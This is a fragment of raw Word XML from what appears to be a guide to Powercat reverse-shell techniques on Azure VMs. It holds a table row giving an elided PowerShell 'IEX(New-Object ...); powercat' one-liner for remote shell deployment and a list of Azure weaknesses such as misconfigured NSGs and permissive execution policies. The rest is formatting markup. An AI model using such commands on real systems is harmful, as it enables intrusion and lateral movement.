          <w:p w14:paraId="77A14E2B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Pivot to internal Azure resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="020E28A9" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086A3068" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>One-Liner Reverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CCFCC5D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>powershell -c "IEX(New-Object ...);</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AE000A9" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>RCE, internet access from Azure VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E86523F" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Fast remote shell deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="743A92EA" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="3C94BD0C">
          <v:rect id="_x0000_i1178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06230BB5" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Azure Is Vulnerable to These Techniques?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984CA24" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure VMs often expose management ports</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> or run services accessible externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B8113" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSG rules and Azure Firewall may be misconfigured</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t>, permitting inbound/outbound traffic needed for Powercat communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A38001" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell execution policies on Windows VMs can be permissive</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t>, allowing script execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707298DA" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-NIC Azure VMs enable lateral movement</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> between subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775ED203" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lack of endpoint detection or monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> allows encoded payloads and reverse shells to operate stealthily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B844111" w14:textId="77777777" w:rsidR="009C72DB" w:rsidRDefault="009C72DB"/>
    <w:p w14:paraId="02785FCE" w14:textId="77777777" w:rsidR="009C72DB" w:rsidRDefault="009C72DB"/>
    <w:p w14:paraId="20303BE5" w14:textId="77777777" w:rsidR="009C72DB" w:rsidRDefault="009C72DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376998F2" w14:textId="77777777" w:rsidR="009C72DB" w:rsidRPr="000B0495" w:rsidRDefault="009C72DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009C72DB" w:rsidRPr="000B0495" w:rsidSect="009D0DDE">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A83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AACE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F02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E95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0AC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DA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0B5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E850D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A1E01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6738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7ACF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B2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975C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F5AC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211C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32E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9228A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A0E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93F97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD7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E3BE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03D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E4611"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="731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506A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F0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67D6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="002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B36F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08C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46E93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7432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727E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="419A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C27A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFA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C47B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B88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DC7F51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="374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86CD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF4C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384A29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="743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42202"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0D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42171"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="239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B475C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B62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002BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BA4C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430E74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30E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86B85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54B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22F3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22D0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223DDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BB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7069E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4E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B1158"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A4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61954"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3C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E4B6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE7A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A5C3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44365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D00D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE16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EF7A33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E7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472C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="143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51D69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DC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460EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06E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55661"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="055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A150C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F8E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F4255"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E838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72D6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AC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10673"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B5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901622">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1793792551">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="201555240">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="601567094">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1475374211">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="274944441">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="875972052">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="399865391">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="866216457">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1403984485">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1912617120">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="552275939">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1426000721">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1222668044">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="669069">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="889725688">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="146628961">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="120419958">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1881701103">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="176114622">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="74211647">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="445659671">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2024278418">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="42606201">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="143862791">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="183711486">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="425081112">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="526523327">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="21830515">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1395468493">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="543324836">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1505319859">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="685643915">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1714772053">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="517499740">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1324894572">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1043940595">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="684943616">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="2105563437">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="203297542">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="490948605">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="984116399">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1148546238">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1593705695">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="14530170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95"/>
    <w:rsid w:val="000B0495"/>
    <w:rsid w:val="0014291C"/>
    <w:rsid w:val="00185670"/>
    <w:rsid w:val="00187D4E"/>
    <w:rsid w:val="001A3DCB"/>
    <w:rsid w:val="001A4E35"/>
    <w:rsid w:val="001A6BEF"/>
    <w:rsid w:val="001E6EF1"/>
    <w:rsid w:val="0022571E"/>
    <w:rsid w:val="002917A7"/>
    <w:rsid w:val="003725E7"/>
    <w:rsid w:val="00374968"/>
    <w:rsid w:val="0040643E"/>
    <w:rsid w:val="00436F62"/>
    <w:rsid w:val="004412F2"/>
    <w:rsid w:val="00610B8A"/>
    <w:rsid w:val="0062316F"/>
    <w:rsid w:val="006560F2"/>
    <w:rsid w:val="00760FDB"/>
    <w:rsid w:val="007D1127"/>
    <w:rsid w:val="007E46C7"/>
    <w:rsid w:val="00843CEA"/>
    <w:rsid w:val="008F3C46"/>
    <w:rsid w:val="008F5563"/>
    <w:rsid w:val="00920B9F"/>
    <w:rsid w:val="00950170"/>
    <w:rsid w:val="009513B1"/>
    <w:rsid w:val="00963582"/>
    <w:rsid w:val="009B29DF"/>
    <w:rsid w:val="009C72DB"/>
    <w:rsid w:val="009C77EC"/>
    <w:rsid w:val="009D0DDE"/>
    <w:rsid w:val="009E661C"/>
    <w:rsid w:val="00A915AD"/>
    <w:rsid w:val="00AE7D4C"/>
    <w:rsid w:val="00BD4776"/>
    <w:rsid w:val="00C33534"/>
    <w:rsid w:val="00C346A2"/>
    <w:rsid w:val="00C43843"/>
    <w:rsid w:val="00D74687"/>
    <w:rsid w:val="00DB06D3"/>
    <w:rsid w:val="00DC5754"/>
    <w:rsid w:val="00E31603"/>
    <w:rsid w:val="00EB43EF"/>
    <w:rsid w:val="00EC435D"/>
    <w:rsid w:val="00EF2094"/>
    <w:rsid w:val="00F017D9"/>
    <w:rsid w:val="00F52B71"/>
    <w:rsid w:val="00FD1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A0E9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{544976EE-486F-4E76-85E7-6E20699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5E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3725E7"/>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3725E7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="MS PGothic" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003725E7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="00B0F0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000B04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04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04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04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04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04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5E7"/>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3725E7"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="MS PGothic" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003725E7"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="00B0F0"/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="007D1127"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4472C4" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:after="60"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="002060"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="007D1127"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="002060"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000B0495"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000B0495"/>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0B0495"/>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0B0495"/>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0B0495"/>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0B0495"/>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0B04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495"/>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0B04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0495"/>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0B0495"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="000B0495"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="000B0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495"/>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0B0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2504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="85081210">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="341053042">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="517620513">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="522936704">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="528834207">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="781455530">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="799417019">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1025402828">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="208660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480691">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1617130740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
